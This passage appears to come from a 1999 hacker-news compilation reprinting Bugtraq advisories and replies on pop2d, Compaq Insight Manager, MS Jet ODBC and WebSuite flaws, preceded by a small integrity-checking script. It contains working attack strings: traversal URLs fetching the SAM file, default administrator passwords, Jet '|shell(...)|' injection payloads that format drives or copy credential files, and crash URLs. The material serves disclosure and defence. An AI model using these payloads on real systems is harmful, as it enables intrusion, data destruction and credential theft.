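    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                baseline[rel] = fingerprint(fh.read())
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report files whose hash no longer matches the cached one, plus files
    that appeared or disappeared since the baseline. A non-empty 'changed'
    list is the condition on which the client would raise its trap to the
    administrator instead of running the script."""
    return {
        "changed": sorted(p for p in baseline
                          if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: session one baselines a login script and a tool
    it launches; before session two the script is altered and a new binary
    appears. Returns the comparison the client would act on."""
    with tempfile.TemporaryDirectory() as root:
        files = {  # constructed sample contents, not real login scripts
            "LOGIN.BAT": b"net use h: \\\\server\\home\r\n",
            "tools/backup.exe": b"MZ\x90\x00placeholder-binary",
        }
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        baseline = build_baseline(root)

        # Session two: the script gained a line and a new file showed up.
        with open(os.path.join(root, "LOGIN.BAT"), "ab") as fh:
            fh.write(b"rem altered after baseline\r\n")
        with open(os.path.join(root, "tools/extra.exe"), "wb") as fh:
            fh.write(b"MZ\x90\x00another-placeholder")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

The baseline is worth something only if it is stored where the server that serves the login script cannot rewrite it, which is the whole point of keeping it on each client; a hash alone does not say whether a change was legitimate, so the comparison feeds a notification, not an automatic block.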
System designers who create new functionality need to include security considerations at every phase of the design process. Any time network access to a system is introduced, there is a significant burden of functionality upon the system to verify that the actions executed on behalf of the remote agent are appropriate. Failure to meet this burden is technical irresponsibility and must be prevented at all costs.

I am immensely curious as to the reactions of Microsoft, Novell, and any other administrator who is reading this now. Please, send me your opinions; I'll publish the best of the replies.

@HWA

50.0 Vulnerability in pop2.imap
~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 20:37:13 +0100
From: Chris Evans
To: BUGTRAQ@netspace.org
Subject: Remote vulnerability in pop2d

Hi

Firstly, sorry if any details are hazy - this is from memory (it's two months since I last looked at this).

This bug concerns the pop-2 daemon, which is a part of the Washington University imap package. I've been waiting for a CERT advisory, but one doesn't seem to be forthcoming. Two and a half months is a long time. Also, the problem has been fixed for a long time.

I'm posting because
a) A fixed full release is available, so people should know about it
b) The flaw is fairly basic and easy to spot, so active exploitation could well be happening

Quick details
=============
Compromise possible: remote users can get a shell as user "nobody"
If: running pop-2d v4.4 or earlier
Fixed version: imap-4.5, available now.

Not vulnerable
==============
RedHat-6.0 isn't vulnerable because imap-4.5 was shipped.

Vulnerable
==========
Anyone who shipped the pop-2 component of imap-4.4 or earlier, including earlier RedHat releases

Details of flaw
===============
pop-2 and pop-3 support the concept of an "anonymous proxy" whereby remote users can connect and open an imap mailbox on _any server they have a valid account on_.
An attacker connects to the vulnerable pop-2 port and connects it to an imap server under their control. Once logged on, issuing a "FOLD" command with a long arg will cause an overflow of a stack based buffer. The arg to FOLD must be somewhere around 1000 bytes - not much bigger, not much smaller. Look at the source.

Additional
==========
I think the concept of "anonymous proxy" is just fundamentally insecure. It opens up a large code path for remote users to explore, i.e. the protocol parsing of imap, etc. The author of imap very responsibly includes a compile time flag to disable this in 4.5. Better still, RedHat-6.0 ships with the proxy disabled.

Cheers
Chris

@HWA

51.0 Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 16:41:36 +0100
From: gabriel.sandberg@INFOSEC.SE
To: BUGTRAQ@netspace.org
Subject: Infosec.19990526.compaq-im.a

Infosec Security Vulnerability Report
No: Infosec.19990526.compaq-im.a
=====================================

Vulnerability Summary
---------------------
Problem:  The web server included in Compaq Insight Manager could expose sensitive information.
Threat:   Anyone that has access to port 2301 where Compaq Insight Manager is installed could get unrestricted access to the servers disk through the "root dot dot" bug.
Platform: Detected on Windows NT and Novell Netware servers running on Compaq hardware.
Solution: Disable the Compaq Insight Manager web server or restrict anonymous access.

Vulnerability Description
-------------------------
When installing Compaq Insight Manager a web server gets installed. This web server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This bug gives unrestricted access to the vulnerable server's disk.
It could easily get exploited with one of the URLs:

http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf

(How many dots there should be is install-dependent)

Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq Insight Manager web server. If you are not using the web server, Infosec recommends disabling the service.

Background
----------
Infosec gives the credits to Master Dogen who first reported the problem (Windows NT and Compaq Insight Manager) to us and wanted us to go public with a vulnerability report. Infosec have found that Novell Netware with Compaq Insight Manager have the same problem but is not as common as on Windows NT. Compaq Sweden was informed about this problem April 26, 1999.

//Gabriel Sandberg, Infosec
gabriel.sandberg@infosec.se

------------------------------------------------------------------------------

Date: Wed, 26 May 1999 16:13:19 -0500
From: Vacuum
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a

Please disregard previous post, the signature got in the way of a paste

In addition to //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se's findings.

Web-Based Management is enabled, by default, when you install the Compaq Server Management Agents for Windows NT. (CPQWMGMT.EXE) The web-enabled Compaq Server Management Agents allow you to view subsystem and status information from a web browser, either locally or remotely. Web-enabled Service Management Agents are available in all 4.x versions of Insight Manager.

Compaq HTTP Server Version 1.2.15 (Pre-Release)

The only user accounts available in the Compaq Server Management Agent WEBEM release are listed below.
http://111.111.111.111:2301/cpqlogin.htm

account anonymous
username anonymous
password

account user
username user
password public

account operator
username operator
password operator

account administrator
username administrator
password administrator

http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes is the url used to change the password. Unfortunately the password is the only information that can be changed and is stored in clear text in the following file.

c:\compaq\wbem\cpqhmmd.acl
-------------------------------------------------------------------------------------
Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F
login in progress... login in progress... 7A21DD9917C0C23907267FC07DBC7D12
administrator administrator D6022D9B3FCA717CCEED36E640160478 51B02137D6BF719FC62F4940DBE1F3E6
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3 041D1015AEC9F60412C7F86E62D6672C
user user EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A

Once you have found one wbem enabled machine, using compaq's HTTP Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm It is trivial to locate other machines.

------------------------------------------------------------------------------

Date: Thu, 27 May 1999 21:43:09 -0500
From: Vacuum
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a (New DoS and correction to my previous post)

Upon further research, I must retract my earlier statement that the Compaq Insight Manager Web Agent's passwords are stored in clear text. In fact, what we see in cpqhmmd.acl are the account name and username in clear text NOT the password.

Explanation of username and password combinations mentioned in my previous post.
c:\compaq\wbem\cpqhmmd.acl or http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl

cpqhmmd.acl contents:

Compaq-WBEM-AclFile, 1.1
anonymousanonymous737EEEFA7617ED94EDD74E659B83035F
login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12
administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0
operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C
useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A

The default usernames and password combinations that I mentioned in my previous post are still valid. Once again these are the defaults:

account: anonymous
username: anonymous
password:

account: user
username: user
password: public

account: operator
username: operator
password: operator

account: administrator
username: administrator
password: administrator

There are three types of data: Default (read only), Sets (read/write), and Reboot (read/write). The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory specifies the level of user that has access to data. The "read=" and "write=" entries in the file set the user accounts required for access, where: 0 = No access, 1 = Anonymous, 2 = User, 3 = Operator, and 4 = Administrator. Changing these entries changes the security. The web-enabled Server Agent service must be stopped and restarted for any changes to take effect. Do not modify anything except the read/write levels.

New Denial of service: Just to make this post somewhat worthwhile.

http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the minimum)

The first time this occurs, an application error occurs in surveyor.exe
Exception: access violation (0xc0000005), Address: 0x100333e5

If you restart the Insight Web Agent Service and repeat it will cause an application error in cpqwmget.exe
Exception: access violation (0xc0000005), Address 0x002486d4

The http://111.111.111.111 will no longer respond until the service is stopped and restarted.
Apologies for my previous error.

vac

------------------------------------------------------------------------------

Date: Fri, 28 May 1999 08:54:10 -0400
From: Ricky Mitchell
To: BUGTRAQ@netspace.org
Subject: second compaq insight manager vulnerability

Greetings,

Yesterday while I was removing the "web insight agent" service from our vulnerable NT servers, I noticed on some machines that port 2301 was still vulnerable. To completely remove the problem, make sure you also stop the "surveyor" service as well if you have that installed. That will completely shut off access to port 2301 and plug the hole.

Regards,
Rick Mitchell
NT administrator
Columbia Gas Transmission Corp

@HWA

52.0 Advisory: NT ODBC Remote Compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 25 May 1999 13:59:30 -0500
From: .rain.forest.puppy.
To: BUGTRAQ@netspace.org
Subject: Advisory: NT ODBC Remote Compromise

--[ Advisory: NT ODBC Remote Compromise
--[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
--[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net

--[ Brief Summary

MS Jet database engine (which runs Access databases) allows an individual to embed VBA in string expressions, which may allow the individual to run commandline NT commands. This, combined with the flaw of IIS running ODBC commands as system_local allow a remote attacker to have full control of the system. Other webservers may be affected. Many MS Jet engines are affected, but may not lead to elevated privileges.

--[ Background

ODBC allows a program flexible access to one or more relational databases using SQL. If a client fails to quote correctly the meta characters in a piece of data used in an SQL query, an attacker may be able to interfere with the tables in the database (see MS SQL appension 'feature' in Phrack 54, article 8). However, the Microsoft "Jet" database engine (aka MS Access) provides some extensions to SQL which allow the execution of VBA (Visual Basic for Applications).
This makes holes in meta character quoting code much more interesting and dangerous.

--[ What form does the hole take?

In SQL, strings must be enclosed in single quotes. If a string includes a single quote it must be escaped by doubling it up. The Jet engine extends this by allowing strings to enclose a VBA expression inside vertical bar characters in the string, like this:

    select 'lil'' string | 6+7 | with number' as foo from table;

This will produce a recordset containing one field with the value "lil' string 13 with number" for each row of the input table. Innocent enough, if the CGI or ASP programs correctly quote the incoming data. However, since the pipe operator is a rather obscure character and is very poorly documented, most people don't know it's there - apparently even Microsoft programmers.

--[ It's a feature, not a bug!

Note the following excerpt from a MS Knowledge Base article:
(http://support.microsoft.com/support/kb/articles/q147/6/87.asp)

    Pipe Character or Vertical Bar

    The pipe character or vertical bar is a reserved character for the Jet database engine. It tells the Jet database engine to evaluate the identifier before evaluating the rest of the expression. Therefore, the Jet database engine inserts the value of the identifier in the expression, and then evaluates it. Vertical bars are used most often in domain aggregate functions when you want the function to automatically recalculate the value it returns in filters. Or vertical bars are used as an alternative to the ampersand (&) operator when you concatenate text values. Because of this, you cannot embed the vertical bar (|) in a literal string, you must embed the Chr() function. Chr(124) is the vertical bar.

--[ Where does it apply?

Any textual data included in a Jet SQL query can contain quoted VBA, whether it is in data to be inserted in a new record or part of a condition expression.
This makes the hole very general (or flexible, if you prefer), since you don't need to know the context in which the string will be evaluated.

--[ What commands are available?

The biggest restriction is that the code must be evaluated in an expression context - no statements. Anything listed as "VBA" in the "Functions Reference" page of the Access Help file will work, although this seems to vary between versions of the Jet engine - for example, in some cases the "eval" function works and in others it doesn't (although when it is available, eval doesn't actually help much because the |...| operator offers a similar if not identical context).

The most useful command is "shell", although this in itself cannot do redirections or pipes - cmd.exe can assist with this though. By using the shell function and running cmd.exe, an attacker can run any command on the system. environ() can also be useful to get environment variable values into your commands, and chr() can be very handy for quoting awkward characters using alphanumerics and brackets. There are also the standard functions like iif() and various string operations (use "&" for concatenation). It would be very difficult to include any kind of loop in the VBA fragment because loops do not have return values.

--[ Which characters need quoting, and how?

If the exploit string will be passing through anything that tries to escape special characters then ' will be doubled up - best to use " instead. Ironically, the vertical bar character can only be escaped by using it to evaluate the chr(124) function. VBA will take pairs of double-quotes (") in a VBA string constant the same way SQL will take pairs of single-quotes. If this doesn't seem to work you can always use chr(34).
ASP also provides a convenient debugging aid - if the expression cannot be correctly evaluated the error message will often include the whole SQL query with the partially decoded exploit string in it--this could help an attacker 'tweak' the exploit string until it works.

If the command needs to be broken up with newlines, they can be inserted between VBA operators inside the |...| construction.

--[ How about a practical example?

An example of a pipeline:

    |shell("cmd /c echo " & chr(124) & " format a:")|

will format whatever is in the floppy drive at the time. Any errors will be silently ignored, although an iconised window will take the focus for the duration of the command. Using "cmd /c" allows the command piping necessary to get a newline into the format command, otherwise the pipe and 'format' are passed as arguments to 'echo'. This string can be included in anything from a simple ODBC operation to a text item in an ASP form on a web page. The function will normally evaluate to a two or three digit number.

A more sophie's-stick-ate-it example involves grabbing a copy of the SAM:

    |shell("cmd /c rdisk /S-")|
    |shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")|

    ** this example includes assumptions about the location of the
    ** system and www publishing directory; it's only an example

Commands can be stacked:

    |shell("cmd /c echo 1 > %temp%\foo.txt") & shell("cmd /c echo 2 \
    >> %temp%\foo.txt") & shell("cmd /c echo 3 >> %temp%\foo.txt")|

    ** line broken for clarity

It is not clear that the commands will always be executed in order. Each shell command executes asynchronously so the code above has two races for whether the shell commands finish updating the file before the next one starts - results will be variable.

--[ Could an attacker modify registry keys?

Ultimately the hole allows anything since you can up/download and run any code, but modifying registry keys from VBA seems to be a little tricky.
The method using advapi32.dll won't work because it requires statements to declare functions from the library, but there doesn't seem to be a way of giving a statement a return value in VBA. It would be easier to create a temporary .reg file and then merge it with "cmd /c regedit /s %temp%\tmp.reg"; the '/s' is important, as it suppresses the informational dialogs/windows.

--[ What permissions will an attacker have?

The dangerous part comes from a context misinterpretation with IIS. IIS runs as system_local; it changes its token context (typically to IUSR_xxx) for filesystem access and application execution. However, the context does *NOT* change when interfacing with the ODBC API. Therefore all ODBC functions (and the associated database calls) are happening under system_local. This allows full access to the system.

--[ Theory of exploitation

This problem can be used over the web against scripts that make queries against local MS Jet ODBC DSNs; therefore, any script or application that uses a MS Jet ODBC DSN could potentially be exploited. The solution is to not use MS Jet ODBC drivers for any DSN--until Microsoft releases a fix. But since this is a documented feature, there stands a chance that some applications may break if removed.

--[ Reality of exploitation

Ok, so let's get down to some nitty-gritty, real-life examples. We'll give a few that just demonstrate the problem....but since any script/application that gives user entered strings to the MS Jet ODBC DSN is vulnerable, we're not going to laundry-list them; rather, we'll show some of the more common cases we found.

--[ Importance of the DSN

Just some really quick background on ODBC & DSNs: an application 'connects' to the ODBC service specifying a specific DSN to query to. The DSNs are defined in the ODBC32 applet of the control panel.
Each DSN is basically a description of the name of the DSN, the drivers to use (in our case, the MS Jet/Access drivers), and the location of the actual database (a .mdb file somewhere in the filesystem). We could also have DSNs that used drivers such as Oracle or MS Sql, and the location would be another server. The whole point is that you only need to know the DSN name--ODBC will take care of where and how the actual database is to be used.

So, great, these scripts query a DSN by name. Well, there are times where a server can have the scripts we mention, but when run, you get an error saying DSN is not found. So now what? Well, if it's an IIS server, check for the existence of /scripts/tools/newdsn.exe. Yes, IIS includes CGI applications *to make DSNs*. If the server doesn't have the DSN we need, we can just make it for them. We only need newdsn.exe, but it's possible to use a 'GUI' through getdrvrs.exe and dsnform.exe. Here's a flowchart:

    http://server/scripts/tools/getdrvrs.exe
    -> pick Microsoft Access Driver (*.mdb)
    -> Enter in the correct DSN name
    -> Enter a location for the .mdb, example: c:\web.mdb
    -> Submit

This will create the DSN. If you want to be ultra-elite and do it the hard way, you can pass all the parameters to newdsn.exe like so:

    http://server/scripts/tools/newdsn.exe?driver=Microsoft%2B
    Access%2BDriver%2B%28*.mdb%29&dsn=DSN_name&dbq=c:\web.mdb&
    newdb=CREATE_DB&attr=

    **all one line, no spaces

Where dsn is the name you want, and dbq is the file location. So for all the examples, we'll include the DSN name, just in case you have to create it.

--[ IIS Sample Applications

According to Russ Cooper of NTBugtraq, sample application problems are stupid and we shouldn't waste our time talking about them. He's already denied posts from myself, David Litchfield, and others. So, if you lived in Russ's little world, you won't have any of the following sample apps installed on your server, so you should just stop reading this article right now.
But for those of you who realize it's just not that simple, perhaps you can learn something here. Also note this goes beyond sample scripts--they're just being used as a command reference example.

Anyways, a good example script is

    http://server/scripts/samples/details.idc?Fname=&Lname=

stick your shellcode in for either Fname or Lname, like so:

    details.idc?Fname=hi&Lname=|shell("cmd+/c+dir")|

This uses DSN named "Web SQL" (notice the space). However, this causes problems, because the actual table must be initialized in the DSN. Never pheer, scripts are here! Run

    http://server/scripts/samples/ctguestb.idc

after you create the DSN (if you had to) and before you run details.idc

--[ MSADC (IIS 4.0)

Starting with IIS 4.0, Microsoft bundled a way to do remote SQL queries on a DSN simply by interfacing via HTTP to a specific .dll. Bug? Hole? Nope, in the documentation Microsoft states that having MSADC installed could lead to security problems. The particular .dll is at

    http://server/msadc/msadcs.dll

Now the particular problem is that there's a slightly custom way to interface to the .dll, using multipart-forms. So it's beyond the scope of just typing in a parameter by hand. So there's two options. One is to see if the server also has the (optional) interface installed. Check out for the existence of

    http://server/msadc/samples/adctest.asp

    ** Note: you have to use Internet Explorer 4.0+ for this

This will give you a Java/Javascript interface that allows you to specify the DSN, uid/password, and SQL string to execute. Note that you'll have to obtain the table structure for the DSNs mentioned herein, because you'll need to construct a valid SQL statement. The other option is to obtain those files yourself from another server, or download and install the MS RDS/ADO/ADC components. Look at http://www.microsoft.com/data/ado/ for more info and where to download.

** One note is that the Java interface lets you specify which server to use.
So you can open the interface locally, off your own server, or find it on server 1, and specify to run SQL commands against whatever DSN on server 2. The one caveat is that error information is not displayed. It helps to have a sniffer going to see what ODBC error messages are returned, if any. If you don't get a record listing, you might want to see what the error was.

Now, what to do? You can obviously just execute SQL commands that contain the pipe character. For instance:

    Connection: DSN=AdvWorks
    Query: Select * from Products where ProductType='|shell("")|'

    ** Insert your shellcode in the shell() function

--[ Sign-Off

Well, I'm sure that's enough to chew for a bit. Sorry, the examples weren't as in-depth as usual--you'll just have to be satisfied with theory. :)

Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
.rain.forest.puppy. [WireTrip] rfp@wiretrip.net

.many thanks to Matthew for working on this project together. :>
.greetings to (#!)ADM, (#)Rhino9, and Phrack
.special thanks to joewee & antilove for giving me a hard time; stran9er
.for all the fun chats and setting me straight; and everyone else I forgot
.before these greets become longer than the advisory. :) Oh, and el8.org rox.

--[ This advisory is ISO 31337 certified. Fact of life: ADM > *

----------------------------------------------------------------------------------

Date: Tue, 25 May 1999 22:00:42 +0100
From: Vittal Aithal
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise

Here's some javascript stuff that'll clean up quotes and things before having them sent off in a sql query... only tested with access, so YMMV.
    // Escape a value for use inside a Jet SQL string literal: single quotes
    // are doubled; | and " are emitted as CHR() calls concatenated outside
    // the quoted literal, so Jet never sees a bare vertical bar.
    function cleanSql (str)
    {
        var newStr = "";
        str = "" + str;
        var oneChar = (str.length == 1);

        if (str.length == 0) {
            return "null";
        }

        for (var i = 0; i < str.length; i++) {
            var repStr = "";

            if (str.charAt(i) == "'") {
                newStr += "''";                 // SQL: double the single quote
            } else if (str.charAt(i) == "|") {
                repStr = 124;                   // emit as CHR(124)
            } else if (str.charAt(i) == "\"") {
                repStr = 34;                    // emit as CHR(34)
            } else {
                newStr += str.charAt(i);
            }

            // Splice the CHR() call in, closing and reopening the literal as needed
            if (repStr) {
                if (i == 0 && !oneChar) {
                    newStr += "CHR(" + repStr + ") &'";
                } else if (i == str.length - 1 && !oneChar) {
                    newStr += "' & CHR(" + repStr + ")";
                } else if (!oneChar) {
                    newStr += "' & CHR(" + repStr + ") & '";
                } else {
                    newStr += "CHR(" + repStr + ")";
                }
            }

            // Open the literal on the first character and close it on the last
            if (!repStr && i == 0) {
                newStr = "'" + newStr;
            }
            if (!repStr && i == str.length - 1) {
                newStr += "'";
            }
        }

        return newStr;
    }

not elegant, but it does work, and stops |'s getting through.

bye

vittal

--
Vittal Aithal
Revolution Ltd

----------------------------------------------------------------------------------

Date: Tue, 25 May 1999 14:43:25 -0700
From: Bigby Findrake
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise

On Tue, 25 May 1999, Vittal Aithal wrote:

> Here's some javascript stuff that'll clean up quotes and things before
> having them sent off in a sql query... only tested with access, so YMMV.

Do keep in mind that this will stop people from using the aforementioned exploits *only when using your forms*. It is still possible to download your web pages, remove the javascript hooks, and then submit their information, or call the CGI (if method GET is accepted) by hand and get around such security measures.

----------------------------------------------------------------------------------

Date: Wed, 26 May 1999 09:01:26 +0100
From: Vittal Aithal
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise

Just to clarify my earlier posting; the code I posted was server-side ASP Javascript. As a number of people have/will point out, running it at the client isn't going to help.
I suspect the same methodology could be applied for other environments (coldfusion / perl DBI::DBD / php / etc).

cheers

vittal

----------------------------------------------------------------------------------

Date: Wed, 26 May 1999 18:56:05 +0200
From: Bronek Kozicki
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise

Hello

I have run some testing. Seems to me that this error has been repaired in MSJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and it's used by ODBC) there's no problem with .IDC files. If one does not have Jet 4 and is using .IDC to open Jet databases (I have not verified this) I believe this is the dangerous situation described by Matthew Astley. Because MS Access 97 is using Jet 3.5 (even if Jet 4 is installed), the problem still can be seen there. If instead of .IDC (which is considered obsolete) one is using .ASP + ADODB, and the ADODB provider used is "Microsoft.Jet.OLEDB.3.51" (i.e. older than "4.0") then the problem still exists.

It's worth noticing that the SQL implementation used in Jet 4 and Jet 3.5 is a little different. Thus applications (in some situations) cannot be simply ported from one to another. One thing I found is different handling of the single- and double-quote characters. MS still has not documented the differences (or I had no luck finding them). AFAIK MS Jet 4 comes with Microsoft Data Access 2.1 (MSDAC21).

Details:

System: WinNT Wrkst 4 US, SP5, IE5, IIS 4 (Option Pack), ODBC MS Access Driver 4.00.3513.00, other (cursor library, administrator etc.) ODBC files 3.510.3711.0

Database: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.25 installed, but Access 97 uses the older version)

Table "guests" as described in Web SQL. Query "SecurityTest" as below:

    SELECT FirstName, LastName FROM Guests WHERE LastName = '|Shell("notepad.exe",1)|';

What happens:

- If I open the query under MS Access, it opens the Notepad app and shows the (empty) resultset. So far the mentioned SQL "feature" works.
- If I use MSQRY32.EXE to open the database, nothing more happens than showing the resultset (an empty one). The same if I run MSQRY32 from within MS Excel ("Get External Data").

- I created a TEST.IDC file as below (and TEST.HTX, of course):

    Datasource: Web SQL
    Username: sa
    Template: details.htx
    SQLStatement:
    +SELECT FirstName, LastName
    +FROM SecurityTest

  and opened it through HTTP. The only result is an empty resultset. I checked the list of processes (using TLIST.EXE) and notepad was not run.

- I created a TEST2.IDC file as below:

    Datasource: Web SQL
    Username: sa
    Template: details.htx
    SQLStatement:
    +SELECT FirstName, LastName
    +FROM Guests
    +WHERE LastName <> '|Shell("notepad.exe",1)|'

  The same. Notepad did not run.

- I created a very simple .ASP:

    <%
    Param = Request.QueryString("Param")
    Data = Request.QueryString("Data")
    %>
    <%
    Set Conn1 = CreateObject("ADODB.Connection")
    'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;Data Source=c:\temp\test.mdb;Mode=Read"
    strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\temp\test.mdb;Mode=Read"
    strSQL = "SELECT FirstName , LastName FROM SecurityTest"
    Conn1.Open strConn
    Set RSet1 = Conn1.Execute(strSQL)
    RSet1.Close
    Conn1.Close
    %>

  Notice that there are 2 connection strings, one is used and the other commented out. The upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51") is UNSAFE. When I opened the .ASP it started NOTEPAD.EXE in the context of the WWW server. If a WWW client can type in any literal into an HTML form, pass it to the .ASP application (for example to be used in a "WHERE" clause) and it remains non-parsed, then he/she will be able to run ANY code in the context of LocalSystem. If such a WWW server is also a domain controller ... well, I'm a bit scared to think about it. The lower connection string ("Provider=Microsoft.Jet.OLEDB.4.0") seems to be safe.

I hope somebody can verify my tests.

Most important point is that while .IDC files are using current ODBC it strongly depends on the configuration of the system.
If Jet 4 is installed and is used by ODBC, we are safe. The same applies to .ASP + ODBC. On the other side is .ASP + ADODB, where the Jet engine can be explicitly selected. If Jet older than 4 is used then we have a dangerous situation. Fortunately in .ASP we can easily parse strings passed from the WWW client (like Vittal Aithal did in JavaScript, but the function will be run on the server side).

Regards.

Bronek Kozicki
--------------------------------------------------
ICQ UID: 25404796
PGP KeyID: 0x4A30FA9A
07EE 10E6 978C 6B33 5208 094E BD61 9067 4A30 FA9A

: -----Original Message-----
: From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]
: Sent: Tuesday, May 25, 1999 9:00 PM
: To: BUGTRAQ@NETSPACE.ORG
: Subject: Advisory: NT ODBC Remote Compromise
:
:
: --[ Advisory: NT ODBC Remote Compromise
:
: --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
: --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
:
: --[ Brief Summary
:
: MS Jet database engine (which runs Access databases) allows an individual
: to embed VBA in string expressions, which may allow the individual to run
: commandline NT commands. This, combined with the flaw of IIS running ODBC
: commands as system_local allow a remote attacker to have full control of
: the system. Other webservers may be affected. Many MS Jet engines are
: affected, but may not lead to elevated priviledges.

Here's something that does not work for me. ODBC is not using the Jet "feature" to run embedded VBA expressions. It seems to use a different database engine.

: --[ Background
:
: ODBC allows a program flexible access to one or more relational databases
: using SQL. If a client fails to quote correctly the meta characters in a
: piece of data used in an SQL query, an attacker may be able to interfere
: with the tables in the database (see MS SQL appension 'feature' in Phrack
: 54, article 8).

That's true, but not connected to the subject. The attacker seems not to use Jet, while the "feature" exists just there. At least on my system.
: However, the Microsoft "Jet" database engine (aka MS Access) provides some
: extensions to SQL which allow the execution of VBA (Visual Basic for
: Applications). This makes holes in meta character quoting code much more
: interesting and dangerous.

That's true.

[cut]

----------------------------------------------------------------------------------

Date: Thu, 27 May 1999 15:48:48 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise

I've had 2 individuals suggest that MDAC 2.1 solves the problems described by rfp@wiretrip.net regarding NT ODBC and Access. There is also another message on Bugtraq suggesting the same thing.

Daryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFusion product is vulnerable to the same attack when using Access datasources, but appears not to be vulnerable after installing MDAC 2.1.

I could put a direct link here to MDAC 2.1, but the fact is that you should not simply upgrade to it without understanding what it changes (and what effect those changes may have on your existing environment). So instead, I give you;

http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm

which has a ton of information about the MDAC 2.1 release.

Cheers,
Russ - NTBugtraq Editor

----------------------------------------------------------------------------------

Date: Thu, 27 May 1999 17:20:45 -0500
From: Jesper M. Johansson
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise

>I could put a direct link here to MDAC 2.1, but the fact is that you
>should not simply upgrade to it without understanding what it changes
>(and what effect those changes may have on your existing environment).
>So instead, I give you;
>
>http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm

If you are using Excel data sources and are updating data in them you will want to keep in mind that upgrading to MDAC 2.1 will break those data sources.
MDAC 2.1 no longer supports the update method for Excel data sources. This will, for example, cause Cold Fusion to access violate, and often causes crashes in InetSrv.exe if you are using IIS. Unfortunately, MS forgot to mention that in the document Russ pointed to.

Jesper

Jesper.M.Johansson-1@umn.edu
Ph.D. Candidate, University of Minnesota
Editor, SANS NT Digest
MCSE, MCP + I
http://ids.csom.umn.edu/jesper

"Juris Praecepta sunt haec: honeste vivere, alterum non laedere, suum cuique tribuere" -Ulpian
("The precepts of the law are these: to live honestly, to harm no one, to give each his due.")

@HWA

53.0 Advisory: Buffer overflow in SmartDesk WebSuite v2.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Advisory: Buffer overflow in SmartDesk WebSuite v2.1

Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99

Description:
-----------

WebSuite v2.1 will crash when an additional 250+ characters are appended after the site's URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98 it will crash with 150+ characters appended after the site's URL. After reinstalling on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars. After the server crashes on NT Workstation 4, it's unable to find the lib file sysclass.flb. (On our tests).

Details:
-------

[Windows NT]

http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000

SDWEBSRV.EXE crashes.

[Windows 98]

http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000

SDWEBSRV.EXE crashes.
-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------

@HWA

